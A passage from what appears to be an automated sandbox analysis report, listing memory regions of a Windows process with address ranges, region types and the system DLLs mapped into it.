"c:\\windows\\syswow64\\cryptbase.dll") Region: id = 451 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 452 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 453 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 454 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 455 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 456 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 457 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 458 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 459 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 460 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 461 start_va = 0x4f0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 462 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 463 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 464 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 465 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 466 start_va = 0x4b90000 end_va = 0x5f8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b90000" filename = "" Region: id = 467 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 468 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 469 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 470 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 471 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 472 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 473 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 474 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 475 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 476 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 477 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 478 start_va = 0x71200000 end_va = 0x71212fff monitored = 0 entry_point = 0x71209950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 479 start_va = 0x70180000 end_va = 0x701aefff monitored = 0 entry_point = 0x701995e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 480 start_va = 0x71560000 end_va = 0x7157afff monitored = 0 entry_point = 0x71569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 481 start_va = 0x5f90000 end_va = 0x62c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 482 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 483 start_va = 0x6fc00000 end_va = 0x6fc39fff monitored = 0 entry_point = 0x6fc19be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 484 start_va = 0x6fb30000 end_va = 0x6fbf7fff monitored = 0 entry_point = 0x6fb9ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 485 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 486 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 487 start_va = 0x6e6f0000 end_va = 0x6e6f7fff monitored = 0 entry_point = 0x6e6f1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 488 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 489 start_va = 0xad0000 end_va = 0xb71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 490 start_va = 0x76be0000 end_va = 0x76bf2fff monitored = 0 entry_point = 0x76be1d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 491 start_va = 0x6f970000 end_va = 0x6f984fff monitored = 0 entry_point = 0x6f975210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 492 start_va = 0x6f950000 end_va = 0x6f962fff monitored = 0 entry_point = 0x6f955c60 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 493 start_va = 0x6f930000 end_va = 0x6f948fff monitored = 0 entry_point = 0x6f9347e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 494 start_va = 0x71420000 end_va = 0x7146efff monitored = 0 entry_point = 0x7142d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 495 start_va = 0x70a30000 end_va = 0x70ab3fff monitored = 0 entry_point = 0x70a56530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 496 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 497 start_va = 0x71510000 end_va = 0x7153efff monitored = 0 entry_point = 0x7151bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 498 start_va = 0x705e0000 end_va = 0x70626fff monitored = 0 entry_point = 0x705f58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 499 start_va = 0x70630000 end_va = 0x70637fff monitored = 0 entry_point = 0x70631920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 500 start_va = 0x4f0000 end_va = 0x4f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 501 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 502 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 503 start_va = 0x6f900000 end_va = 0x6f927fff monitored = 0 entry_point = 0x6f907820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 504 start_va = 0x6f880000 end_va = 0x6f8f0fff monitored = 0 entry_point = 0x6f8d69e0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\SysWOW64\\efswrt.dll" (normalized: "c:\\windows\\syswow64\\efswrt.dll") Region: id = 505 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 506 start_va = 0x6f830000 end_va = 0x6f878fff monitored = 0 entry_point = 0x6f836450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 507 start_va = 0x530000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 508 start_va = 0xad0000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 509 start_va = 0xb10000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 510 start_va = 0x62d0000 end_va = 0x630ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062d0000" filename = "" Region: id = 511 start_va = 0x530000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 512 start_va = 0x6310000 end_va = 0x634ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006310000" filename = "" Region: id = 513 start_va = 0x6350000 end_va = 0x644ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006350000" filename = "" Region: id = 514 start_va = 0x6450000 end_va = 0x654ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006450000" filename = "" Region: id = 515 start_va = 0xad0000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 516 start_va = 0xb10000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 517 start_va = 0x62d0000 end_va = 0x630ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062d0000" filename = "" Region: id = 518 start_va = 0x6550000 end_va = 0x658ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006550000" filename = "" Region: id = 519 start_va = 0x6590000 end_va = 0x65cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 520 start_va = 0x65d0000 end_va = 0x660ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065d0000" filename = "" Region: id = 521 start_va = 0x6610000 end_va = 0x664ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006610000" filename = "" Region: id = 522 start_va = 0x6650000 end_va = 0x668ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006650000" filename = "" Region: id = 523 start_va = 0x6690000 end_va = 0x66cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006690000" filename = "" Region: id = 524 start_va = 0x66d0000 end_va = 0x670ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066d0000" filename = "" Region: id = 525 start_va = 0x6710000 end_va = 0x674ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006710000" filename = "" Region: id = 526 start_va = 0x6750000 end_va = 0x678ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006750000" filename = "" Region: id = 527 start_va = 0x6790000 end_va = 0x67cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006790000" filename = "" Region: id = 528 start_va = 0x67d0000 end_va = 0x680ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067d0000" filename = "" Region: id = 529 start_va = 0x6810000 end_va = 0x684ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006810000" filename = "" Region: id = 530 start_va = 0x6850000 end_va = 0x688ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006850000" filename = "" Region: id = 531 start_va = 0x6890000 end_va = 0x68cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006890000" filename = "" Region: id = 532 start_va = 0x68d0000 end_va = 0x690ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068d0000" filename = "" Region: id = 533 start_va = 0x6910000 end_va = 0x694ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006910000" filename = "" Region: id = 534 start_va = 0x6950000 end_va = 0x698ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006950000" filename = "" Region: id = 535 start_va = 0x6990000 end_va = 0x69cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006990000" filename = "" Region: id = 536 start_va = 0x69d0000 end_va = 0x6a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000069d0000" filename = "" Region: id = 537 start_va = 0x6a10000 end_va = 0x6a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a10000" filename = "" Region: id = 538 start_va = 0x6a50000 end_va = 0x6a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a50000" filename = "" Region: id = 539 start_va = 0x6a90000 end_va = 0x6acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 540 start_va = 0x6ad0000 end_va = 0x6b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ad0000" filename = "" Region: id = 541 start_va = 0x6b10000 end_va = 0x6b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b10000" filename = "" Region: id = 542 start_va = 0x6b50000 end_va = 0x6b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b50000" filename = "" Region: id = 543 start_va = 0x6b90000 end_va = 0x6bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b90000" filename = "" Region: id = 544 start_va = 0x6bd0000 end_va = 0x6c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006bd0000" filename = "" Region: id = 545 start_va = 0x6c10000 end_va = 0x6c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c10000" filename = "" Region: id = 546 start_va = 0x6c50000 end_va = 0x6c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c50000" filename = "" Region: id = 547 start_va = 0x6c90000 end_va = 0x6ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c90000" filename = "" Region: id = 548 start_va = 0x6cd0000 end_va = 0x6d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006cd0000" filename = "" Region: id = 549 start_va = 0x6d10000 end_va = 0x6d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d10000" filename = "" Region: id = 550 start_va = 0x6d50000 end_va = 0x6d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d50000" filename = "" Region: id = 551 start_va = 0x6d90000 end_va = 0x6dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d90000" filename = "" Region: id = 552 start_va = 0x6dd0000 end_va = 0x6e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006dd0000" filename = "" Region: id = 553 start_va = 0x6e10000 end_va = 0x6e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e10000" filename = "" Region: id = 554 start_va = 0x6e50000 end_va = 0x6e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e50000" filename = "" Region: id = 555 start_va = 0x6e90000 end_va = 0x6ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e90000" filename = "" Region: id = 556 start_va = 0x6ed0000 end_va = 0x6f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ed0000" filename = "" Region: id = 557 start_va = 0x6f10000 end_va = 0x6f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f10000" filename = "" Region: id = 558 start_va = 0x6f50000 end_va = 0x6f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f50000" filename = "" Region: id = 559 start_va = 0x6f90000 end_va = 0x6fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f90000" filename = "" Region: id = 560 start_va = 0x6fd0000 end_va = 0x700ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fd0000" filename = "" Region: id = 561 start_va = 0x7010000 end_va = 0x704ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007010000" filename = "" Region: id = 562 start_va = 0x7050000 end_va = 0x708ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007050000" filename = "" Region: id = 563 start_va = 0x7090000 end_va = 0x70cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007090000" filename = "" Region: id = 564 start_va = 0x70d0000 end_va = 0x710ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000070d0000" filename = "" Region: id = 565 start_va = 0x7110000 end_va = 0x714ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007110000" filename = "" Region: id = 566 start_va = 0x7150000 end_va = 0x718ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007150000" filename = "" Region: id = 567 start_va = 0x7190000 end_va = 0x71cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007190000" filename = "" Region: id = 568 start_va = 0x71d0000 end_va = 0x720ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071d0000" filename = "" Region: id = 569 start_va = 0x7210000 end_va = 0x724ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007210000" filename = "" Region: id = 570 start_va = 0x7250000 end_va = 0x728ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007250000" filename = "" Region: id = 571 start_va = 0x7290000 end_va = 0x72cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007290000" filename = "" Region: id = 572 start_va = 0x72d0000 end_va = 0x730ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072d0000" filename = "" Region: id = 573 start_va = 0x7310000 end_va = 0x734ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 574 start_va = 0x7350000 end_va = 0x738ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007350000" filename = "" Region: id = 575 start_va = 0x7390000 end_va = 0x73cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007390000" filename = "" Region: id = 576 start_va = 0x73d0000 end_va = 0x740ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073d0000" filename = "" Region: id = 577 start_va = 0x7410000 end_va = 0x744ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007410000" filename = "" Region: id = 578 start_va = 0x7450000 end_va = 0x748ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007450000" filename = "" Region: id = 579 start_va = 0x7490000 end_va = 0x74cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007490000" filename = "" Region: id = 580 start_va = 0x74d0000 end_va = 0x750ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000074d0000" filename = "" Region: id = 581 start_va = 0x7510000 end_va = 0x754ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007510000" filename = "" Region: id = 582 start_va = 0x7550000 end_va = 0x758ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007550000" filename = "" Region: id = 583 start_va = 0x7590000 end_va = 0x75cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007590000" filename = "" Region: id = 584 start_va = 0x75d0000 end_va = 0x760ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075d0000" filename = "" Region: id = 585 start_va = 0x7610000 end_va = 0x764ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007610000" filename = "" Region: id = 586 start_va = 0x7650000 end_va = 0x768ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007650000" filename = "" Region: id = 587 start_va = 0x7690000 end_va = 0x76cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007690000" filename = "" Region: id = 588 start_va = 0x76d0000 end_va = 0x770ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076d0000" filename = "" Region: id = 589 start_va = 0x7710000 end_va = 0x774ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007710000" filename = "" Region: id = 590 start_va = 0x7750000 end_va = 0x778ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007750000" filename = "" Region: id = 591 start_va = 0x7790000 end_va = 0x77cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007790000" filename = "" Region: id = 592 start_va = 0x77d0000 end_va = 0x780ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077d0000" filename = "" Region: id = 593 start_va = 0x7810000 end_va = 0x784ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007810000" filename = "" Region: id = 594 start_va = 0x7850000 end_va = 0x788ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007850000" filename = "" Region: id = 595 start_va = 0x7890000 end_va = 0x78cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007890000" filename = "" Region: id = 596 start_va = 0x78d0000 end_va = 0x790ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000078d0000" filename = "" Region: id = 597 start_va = 0x7910000 end_va = 0x794ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007910000" filename = "" Region: id = 598 start_va = 0x7950000 end_va = 0x798ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007950000" filename = "" Region: id = 599 start_va = 0x7990000 end_va = 0x79cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007990000" filename = "" Region: id = 600 start_va = 0x79d0000 end_va = 0x7a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079d0000" filename = "" Region: id = 601 start_va = 0x7a10000 end_va = 0x7a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a10000" filename = "" Region: id = 602 start_va = 0x7a50000 end_va = 0x7a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a50000" filename = "" Region: id = 603 start_va = 0x7a90000 end_va = 0x7acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a90000" filename = "" Region: id = 604 start_va = 0x7ad0000 end_va = 0x7b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ad0000" filename = "" Region: id = 605 start_va = 0x7b10000 end_va = 0x7b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b10000" filename = "" Region: id = 606 start_va = 0x7b50000 end_va = 0x7b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b50000" filename = "" Region: id = 607 start_va = 0x7b90000 end_va = 0x7bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b90000" filename = "" Region: id = 608 start_va = 0x7bd0000 end_va = 0x7c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007bd0000" filename = "" Region: id = 609 start_va = 0x7c10000 end_va = 0x7c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c10000" filename = "" Region: id = 610 start_va = 0x7c50000 end_va = 0x7c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c50000" filename = "" Region: id = 611 start_va = 0x7c90000 end_va = 0x7ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c90000" filename = "" Region: id = 612 start_va = 0x7cd0000 end_va = 0x7d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007cd0000" filename = "" Region: id = 613 start_va = 0x7d10000 end_va = 0x7d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d10000" filename = "" Region: id = 614 start_va = 0x7d50000 end_va = 0x7d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d50000" filename = "" Region: id = 615 start_va = 0x7d90000 end_va = 0x7dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d90000" filename = "" Region: id = 616 start_va = 0x7dd0000 end_va = 0x7e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007dd0000" filename = "" Region: id = 617 start_va = 0x7e10000 end_va = 0x7e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e10000" filename = "" Region: id = 618 start_va = 0x7e50000 end_va = 0x7e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e50000" filename = "" Region: id = 619 start_va = 0x7e90000 end_va = 0x7ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e90000" filename = "" Region: id = 620 start_va = 0x7ed0000 end_va = 0x7f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ed0000" filename = "" Region: id = 621 start_va = 0x7f10000 end_va = 0x7f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f10000" filename = "" Region: id = 622 start_va = 0x7f50000 end_va = 0x7f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f50000" filename = "" Region: id = 623 start_va = 0x7f90000 end_va = 0x7fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f90000" filename = "" Region: id = 624 start_va = 0x7fd0000 end_va = 0x800ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fd0000" filename = "" Region: id = 625 start_va = 